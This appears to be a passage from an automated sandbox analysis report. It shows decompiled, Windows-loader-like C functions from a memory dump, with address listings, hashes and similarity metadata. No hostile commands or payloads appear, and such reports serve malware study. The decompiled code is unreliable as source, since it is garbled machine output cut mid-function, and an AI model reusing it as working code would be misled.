																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E02B0E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L02B08F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02B33C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                        0x02b0d5f2
                        0x02b0d5f5
                        0x02b0d5f5
                        0x02b0d5fd
                        0x02b0d600
                        0x02b0d60a
                        0x02b0d60d
                        0x02b0d617
                        0x02b0d61d
                        0x02b0d627
                        0x02b0d62e
                        0x02b0d911
                        0x02b0d913
                        0x00000000
                        0x02b0d919
                        0x02b0d919
                        0x02b0d919
                        0x02b0d634
                        0x02b0d634
                        0x02b0d634
                        0x02b0d634
                        0x02b0d640
                        0x02b0d8bf
                        0x00000000
                        0x02b0d646
                        0x02b0d646
                        0x02b0d64d
                        0x02b0d652
                        0x02b5b2fc
                        0x02b5b2fc
                        0x02b5b302
                        0x02b5b33b
                        0x02b5b341
                        0x00000000
                        0x02b5b304
                        0x02b5b304
                        0x02b5b319
                        0x02b5b31e
                        0x02b5b324
                        0x02b5b326
                        0x02b5b332
                        0x02b5b347
                        0x02b5b34c
                        0x02b5b351
                        0x02b5b35a
                        0x00000000
                        0x02b5b328
                        0x02b5b328
                        0x00000000
                        0x02b5b328
                        0x02b5b326
                        0x02b0d658
                        0x02b0d658
                        0x02b0d65b
                        0x02b0d665
                        0x00000000
                        0x02b0d66b
                        0x02b0d66b
                        0x02b0d66b
                        0x02b0d66b
                        0x02b0d66d
                        0x02b0d672
                        0x02b0d67a
                        0x00000000
                        0x00000000
                        0x02b0d680
                        0x02b0d686
                        0x02b0d8ce
                        0x02b0d8d4
                        0x02b0d8dd
                        0x02b0d8e0
                        0x02b0d68c
                        0x02b0d691
                        0x02b0d69d
                        0x02b0d6a2
                        0x02b0d6a7
                        0x02b0d6b0
                        0x02b0d6b5
                        0x02b0d6e0
                        0x02b0d6b7
                        0x02b0d6b7
                        0x02b0d6b9
                        0x02b0d6b9
                        0x02b0d6bb
                        0x02b0d6bd
                        0x02b0d6ce
                        0x02b0d6d0
                        0x02b0d6d2
                        0x02b5b363
                        0x02b5b365
                        0x00000000
                        0x02b5b36b
                        0x00000000
                        0x02b5b36b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0d6bf
                        0x02b0d6bf
                        0x02b0d6e5
                        0x02b0d6e7
                        0x02b0d6e9
                        0x02b0d6ec
                        0x02b0d6ec
                        0x02b0d6ef
                        0x02b0d6f5
                        0x02b0d6f9
                        0x02b0d6fb
                        0x02b0d6fd
                        0x02b0d701
                        0x02b0d703
                        0x02b0d70a
                        0x02b0d70a
                        0x02b0d701
                        0x02b0d710
                        0x02b0d710
                        0x02b0d6c1
                        0x02b0d6c1
                        0x02b0d6c6
                        0x02b5b36d
                        0x02b5b36f
                        0x00000000
                        0x02b5b375
                        0x02b5b375
                        0x02b5b375
                        0x00000000
                        0x02b5b375
                        0x00000000
                        0x02b0d6cc
                        0x02b0d6d8
                        0x02b0d6d8
                        0x02b0d6d8
                        0x00000000
                        0x02b0d6c6
                        0x02b0d6bf
                        0x00000000
                        0x02b0d6da
                        0x02b0d6da
                        0x02b0d716
                        0x02b0d71b
                        0x02b0d720
                        0x02b0d726
                        0x02b0d726
                        0x02b0d72d
                        0x00000000
                        0x02b0d733
                        0x02b0d739
                        0x02b0d742
                        0x02b0d750
                        0x02b0d758
                        0x02b0d764
                        0x02b0d776
                        0x02b0d77a
                        0x02b0d783
                        0x02b0d928
                        0x02b0d92c
                        0x02b0d93d
                        0x02b0d944
                        0x02b0d94f
                        0x02b0d954
                        0x02b0d956
                        0x02b0d95f
                        0x02b0d961
                        0x02b0d973
                        0x02b0d973
                        0x02b0d956
                        0x02b0d944
                        0x02b0d92c
                        0x02b0d78b
                        0x02b5b394
                        0x02b0d791
                        0x02b0d798
                        0x02b5b3a3
                        0x02b5b3bb
                        0x02b5b3bb
                        0x02b0d7a5
                        0x02b0d866
                        0x02b0d870
                        0x02b0d884
                        0x02b0d892
                        0x02b0d898
                        0x02b0d89e
                        0x02b0d8a0
                        0x02b0d8a6
                        0x02b0d8ac
                        0x02b0d8ae
                        0x02b0d8b4
                        0x02b0d8b4
                        0x02b0d8ae
                        0x02b0d7a5
                        0x02b0d78b
                        0x02b0d7b1
                        0x02b5b3c5
                        0x02b5b3c5
                        0x02b0d7c3
                        0x02b0d7ca
                        0x02b0d7e5
                        0x02b0d7eb
                        0x02b0d8eb
                        0x02b0d8ed
                        0x00000000
                        0x02b0d8f3
                        0x02b0d8f3
                        0x02b0d8f3
                        0x00000000
                        0x02b0d8ed
                        0x02b0d7cc
                        0x02b0d7cc
                        0x02b0d7d2
                        0x00000000
                        0x02b0d7d4
                        0x02b0d7d4
                        0x02b0d7d7
                        0x02b0d7df
                        0x02b5b3d4
                        0x02b5b3d9
                        0x02b5b3dc
                        0x02b5b3dc
                        0x02b5b3df
                        0x02b5b3e2
                        0x02b5b468
                        0x02b5b46d
                        0x02b5b46f
                        0x02b5b46f
                        0x02b5b475
                        0x02b0d8f8
                        0x02b0d8f9
                        0x02b0d8fd
                        0x02b5b3e8
                        0x02b5b3e8
                        0x02b5b3eb
                        0x02b5b3ed
                        0x00000000
                        0x02b5b3ef
                        0x02b5b3ef
                        0x02b5b3f1
                        0x02b5b3f4
                        0x02b5b3fe
                        0x02b5b404
                        0x02b5b409
                        0x02b5b40e
                        0x02b5b410
                        0x02b5b410
                        0x02b5b414
                        0x02b5b414
                        0x02b5b41b
                        0x02b5b420
                        0x02b5b423
                        0x02b5b425
                        0x02b5b427
                        0x02b5b42a
                        0x02b5b42d
                        0x02b5b42d
                        0x02b5b42a
                        0x02b5b432
                        0x02b5b436
                        0x02b5b438
                        0x02b5b43b
                        0x02b5b43b
                        0x02b5b449
                        0x02b5b44e
                        0x02b5b454
                        0x02b5b458
                        0x02b5b458
                        0x02b5b45d
                        0x00000000
                        0x02b5b45d
                        0x02b5b3ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0d7df
                        0x02b0d7d2
                        0x02b0d7ca
                        0x02b5b37c
                        0x02b5b37e
                        0x02b5b385
                        0x02b5b38a
                        0x00000000
                        0x02b5b38a
                        0x02b0d742
                        0x02b0d7f1
                        0x02b0d7f8
                        0x02b5b49b
                        0x02b5b49b
                        0x02b0d800
                        0x02b0d837
                        0x02b0d843
                        0x02b0d845
                        0x02b0d847
                        0x02b0d84a
                        0x02b0d84b
                        0x02b0d84e
                        0x02b0d857
                        0x02b0d802
                        0x02b0d802
                        0x02b0d80d
                        0x00000000
                        0x02b0d818
                        0x02b0d818
                        0x02b0d824
                        0x02b0d831
                        0x02b5b4a5
                        0x02b5b4ab
                        0x02b5b4b3
                        0x02b5b4b8
                        0x02b5b4bb
                        0x00000000
                        0x02b5b4c1
                        0x02b5b4c1
                        0x02b5b4c8
                        0x00000000
                        0x02b5b4ce
                        0x02b5b4d4
                        0x02b5b4e1
                        0x02b5b4e3
                        0x02b5b4e5
                        0x00000000
                        0x02b5b4eb
                        0x02b5b4f0
                        0x02b5b4f2
                        0x02b0dac9
                        0x02b0dacc
                        0x02b0dacf
                        0x02b0dad1
                        0x02b0dd78
                        0x02b0dd78
                        0x02b0dcf2
                        0x00000000
                        0x02b0dad7
                        0x02b0dad9
                        0x02b0dadb
                        0x00000000
                        0x00000000
                        0x02b0dae1
                        0x02b0dae1
                        0x02b0dae4
                        0x02b0dae6
                        0x02b5b4f9
                        0x02b5b4f9
                        0x02b5b500
                        0x02b0daec
                        0x02b0daec
                        0x02b0daf5
                        0x02b0daf8
                        0x02b0dafb
                        0x02b0db03
                        0x02b0db11
                        0x02b0db16
                        0x02b0db19
                        0x02b0db1b
                        0x02b5b52c
                        0x02b5b531
                        0x02b5b534
                        0x02b0db21
                        0x02b0db21
                        0x02b0db24
                        0x02b0dcd9
                        0x02b0dce2
                        0x02b0dce5
                        0x02b0dd6a
                        0x02b0dd6d
                        0x00000000
                        0x02b0dd73
                        0x02b5b51a
                        0x02b5b51c
                        0x02b5b51f
                        0x02b5b524
                        0x00000000
                        0x02b5b524
                        0x02b0dce7
                        0x02b0dce7
                        0x02b0dce7
                        0x00000000
                        0x02b0dce7
                        0x00000000
                        0x02b0db2a
                        0x02b0db2c
                        0x02b0db31
                        0x02b0db33
                        0x02b0db36
                        0x02b0db39
                        0x02b0db3b
                        0x02b0db66
                        0x02b0db66
                        0x02b0db3d
                        0x02b0db3d
                        0x02b0db3e
                        0x02b0db46
                        0x02b0db47
                        0x02b0db49
                        0x02b0db4c
                        0x02b0db53
                        0x02b0db55
                        0x02b0db58
                        0x02b0db5a
                        0x02b5b50a
                        0x02b5b50f
                        0x02b5b512
                        0x02b0db60
                        0x02b0db60
                        0x02b0db63
                        0x02b0db63
                        0x00000000
                        0x02b0db63
                        0x02b0db5a
                        0x02b0db3b
                        0x02b0db24
                        0x02b0db69
                        0x02b0db69
                        0x02b0db6c
                        0x02b0db6f
                        0x02b0db74
                        0x02b5b557
                        0x02b5b557
                        0x02b5b55e
                        0x02b0db7a
                        0x02b0db7c
                        0x02b0db7f
                        0x02b0db82
                        0x02b0db85
                        0x00000000
                        0x02b0db8b
                        0x02b0db8b
                        0x02b0db8d
                        0x02b0db9b
                        0x02b0db9b
                        0x02b0db9d
                        0x02b0dba0
                        0x02b0dba2
                        0x02b0dba4
                        0x02b0dba7
                        0x02b0dba9
                        0x02b0dbae
                        0x02b0dbae
                        0x02b0dbb1
                        0x02b0dbb4
                        0x02b0dbb4
                        0x02b0dbb7
                        0x02b0dbba
                        0x02b0dcd2
                        0x02b0dcd4
                        0x00000000
                        0x02b0dbc0
                        0x02b0dbc0
                        0x02b0dbd2
                        0x02b0dbd7
                        0x02b0dbda
                        0x02b0dbdd
                        0x02b0dbdf
                        0x00000000
                        0x02b0dbe5
                        0x02b0dbe5
                        0x02b0dbee
                        0x02b0dbf1
                        0x02b5b541
                        0x02b5b544
                        0x00000000
                        0x02b5b546
                        0x02b5b546
                        0x00000000
                        0x02b5b546
                        0x02b0dbf7
                        0x02b0dbf7
                        0x02b0dbfd
                        0x02b0dbfd
                        0x02b0dbff
                        0x02b0dc0b
                        0x02b0dc15
                        0x02b0dc1b
                        0x02b0dc1d
                        0x02b0dc21
                        0x02b0dc21
                        0x02b0dc23
                        0x02b0dc23
                        0x02b0dc26
                        0x02b0dc29
                        0x02b0dc2b
                        0x00000000
                        0x00000000
                        0x02b0dc31
                        0x02b0dc34
                        0x02b0dc36
                        0x02b0dcbf
                        0x02b0dcbf
                        0x02b0dcc2
                        0x00000000
                        0x02b0dc3c
                        0x02b0dc41
                        0x02b0dc43
                        0x00000000
                        0x02b0dc45
                        0x02b0dc45
                        0x02b0dc47
                        0x00000000
                        0x02b0dc4d
                        0x02b0dc4d
                        0x02b0dc50
                        0x02b0dc52
                        0x02b0dc55
                        0x02b0dcfa
                        0x02b0dcfe
                        0x02b0dd08
                        0x02b0dd0a
                        0x02b0dd0c
                        0x00000000
                        0x02b0dd12
                        0x02b0dd15
                        0x02b0dd2d
                        0x02b0dd2f
                        0x02b0dd32
                        0x02b0dd35
                        0x00000000
                        0x02b0dd35
                        0x02b0dc5b
                        0x02b0dc5b
                        0x02b0dc5e
                        0x02b0dc61
                        0x02b0dc64
                        0x02b0dc67
                        0x02b0dc67
                        0x02b0dc6a
                        0x02b0dc6c
                        0x02b0dc8e
                        0x02b0dc8e
                        0x02b0dc91
                        0x02b0dc93
                        0x02b0dcce
                        0x02b0dcce
                        0x02b0dc95
                        0x02b0dc9c
                        0x02b0dc6e
                        0x02b0dc72
                        0x02b0dc75
                        0x02b0dc77
                        0x02b0dc79
                        0x02b5b551
                        0x02b5b551
                        0x00000000
                        0x02b0dc7f
                        0x02b0dc7f
                        0x02b0dc81
                        0x00000000
                        0x02b0dc83
                        0x02b0dc86
                        0x02b0dc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0dc88
                        0x02b0dc81
                        0x02b0dc79
                        0x02b0dc6c
                        0x02b0dc55
                        0x02b0dc47
                        0x02b0dc43
                        0x00000000
                        0x02b0dc36
                        0x02b0dc23
                        0x00000000
                        0x02b0dbff
                        0x02b0dbf1
                        0x02b0dbdf
                        0x02b0db8f
                        0x02b0db92
                        0x02b0db95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0db95
                        0x02b0db8d
                        0x02b0db85
                        0x02b0db74
                        0x02b0dc9f
                        0x02b0dca2
                        0x02b0dcb0
                        0x02b0dcb0
                        0x02b0dad1
                        0x02b5b4e5
                        0x02b5b4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0d831
                        0x02b0d80d
                        0x00000000
                        0x02b0d800
                        0x02b5b47f
                        0x02b5b485
                        0x00000000
                        0x02b5b485
                        0x02b0d665
                        0x02b0d652
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01c159efdb1035ccdcdec92c64b9010134387814464cfff10870454a4f8e43c1
                        • Instruction ID: 4cabc2b950b4170c0dcaa3e22e281678a8580e54288c7d2049eadb5f7a29457c
                        • Opcode Fuzzy Hash: 01c159efdb1035ccdcdec92c64b9010134387814464cfff10870454a4f8e43c1
                        • Instruction Fuzzy Hash: 80E1A070A00766CFEB26CFA4C880B69BBB2FF45308F0441D9D949AB2D0DB74A981CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0849B, Relevance: .3, Instructions: 290COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E02B0849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x2bcf9c0);
				E02B4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x2be7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E02B0CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E02B12280( *[fs:0x30], 0x2be8550);
						_t139 =  *0x2be7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E02B2F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E02B0FFB0(_t193, _t235, 0x2be8550);
								L5:
								return E02B4D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E02AF1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x2be7b9c; // 0x0
							_t235 = L02B14620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x2be7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E02B2A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E02B0FFB0(_t193, _t235, 0x2be8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L02B177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L02B177F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x2be7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x2be7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E02B337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x2be7b9c; // 0x0
									_t214 = L02B14620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E02B337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x2be7b10 =  *0x2be7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x2be7b04 =  *0x2be7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L02B177F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L02B177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x2be7b08 =  *0x2be7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E02B357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E02B3F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L02B177F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E02B2A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L02B177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E02B396C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                        0x02b0849b
                        0x02b0849b
                        0x02b0849b
                        0x02b0849b
                        0x02b0849d
                        0x02b084a2
                        0x02b084a7
                        0x02b084b1
                        0x02b084d8
                        0x00000000
                        0x02b084b3
                        0x02b084c4
                        0x02b084c9
                        0x02b084cd
                        0x02b084cf
                        0x02b084cf
                        0x02b084d6
                        0x02b084e6
                        0x02b084e9
                        0x02b084ec
                        0x02b084ef
                        0x02b084f2
                        0x02b084f4
                        0x02b084fc
                        0x02b08501
                        0x02b08506
                        0x02b08509
                        0x02b086e0
                        0x02b086e5
                        0x02b086e8
                        0x02b086ed
                        0x02b086f0
                        0x02b086f2
                        0x02b59afd
                        0x02b59b02
                        0x02b084da
                        0x02b084df
                        0x02b084df
                        0x02b086fa
                        0x02b086fd
                        0x02b086fe
                        0x02b08701
                        0x02b08706
                        0x02b08709
                        0x02b0870b
                        0x00000000
                        0x00000000
                        0x02b08711
                        0x02b08725
                        0x02b08727
                        0x02b0872a
                        0x02b0872c
                        0x02b59af0
                        0x02b59af5
                        0x02b08732
                        0x02b08732
                        0x02b08732
                        0x02b08735
                        0x02b08737
                        0x02b08515
                        0x02b08515
                        0x02b08518
                        0x02b0851d
                        0x02b08523
                        0x02b08527
                        0x02b0852b
                        0x02b08537
                        0x02b08539
                        0x02b0853c
                        0x02b0853e
                        0x02b0868c
                        0x02b08691
                        0x02b08699
                        0x02b0869b
                        0x02b08744
                        0x02b08748
                        0x02b086a1
                        0x02b086a1
                        0x02b086a1
                        0x02b086a4
                        0x02b086a8
                        0x02b59bdf
                        0x02b59bdf
                        0x02b086ae
                        0x02b086b0
                        0x00000000
                        0x02b086b6
                        0x00000000
                        0x02b59be9
                        0x02b086b0
                        0x02b08544
                        0x02b0854a
                        0x02b0854d
                        0x02b08551
                        0x02b0876e
                        0x02b08778
                        0x02b0877b
                        0x02b08780
                        0x02b08557
                        0x02b08557
                        0x02b0855d
                        0x02b0855d
                        0x02b0856b
                        0x02b0856e
                        0x02b08570
                        0x02b08573
                        0x02b08576
                        0x02b08576
                        0x02b08579
                        0x02b0857b
                        0x00000000
                        0x00000000
                        0x02b08581
                        0x02b085a0
                        0x02b085a2
                        0x02b085a5
                        0x02b085a7
                        0x02b59b1b
                        0x02b59b1b
                        0x02b0862e
                        0x02b0862e
                        0x02b08631
                        0x02b08631
                        0x02b08634
                        0x02b08636
                        0x02b08669
                        0x02b08669
                        0x02b0866b
                        0x02b59bbf
                        0x02b59bc4
                        0x02b59bc8
                        0x02b59bce
                        0x02b59bce
                        0x02b08671
                        0x02b08671
                        0x02b08674
                        0x02b08676
                        0x02b59bae
                        0x02b59bae
                        0x02b08676
                        0x02b0867c
                        0x02b0867e
                        0x02b08688
                        0x02b08688
                        0x00000000
                        0x02b0867e
                        0x02b08638
                        0x02b08638
                        0x02b0863b
                        0x02b0863e
